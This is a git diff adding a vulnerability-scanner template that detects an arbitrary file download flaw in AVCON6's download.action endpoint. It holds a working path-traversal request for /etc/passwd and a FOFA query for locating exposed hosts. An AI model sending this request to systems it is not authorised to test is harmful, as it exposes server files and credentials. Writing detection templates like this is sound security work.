diff --git a/http/vulnerabilities/other/avcon6-download-action-lfi.yaml b/http/vulnerabilities/other/avcon6-download-action-lfi.yaml new file mode 100644 index 0000000000..3bd768a759 --- /dev/null +++ b/http/vulnerabilities/other/avcon6-download-action-lfi.yaml @@ -0,0 +1,38 @@ +id: avcon6-download-action-lfi + +info: + name: AVCON6 download.action Arbitrary File Download + author: DhiyaneshDk + severity: high + description: | + File Download vulnerability in the download.action of the AVCON6 system management platform, through which an attacker can download arbitrary files from the server + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/AVCON6%20%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20download.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.md + metadata: + max-request: 1 + verified: true + fofa-query: app="AVCON-6" + tags: avcon6,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/download.action?filename=../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + - "filename=" + condition: and + + - type: status + status: + - 200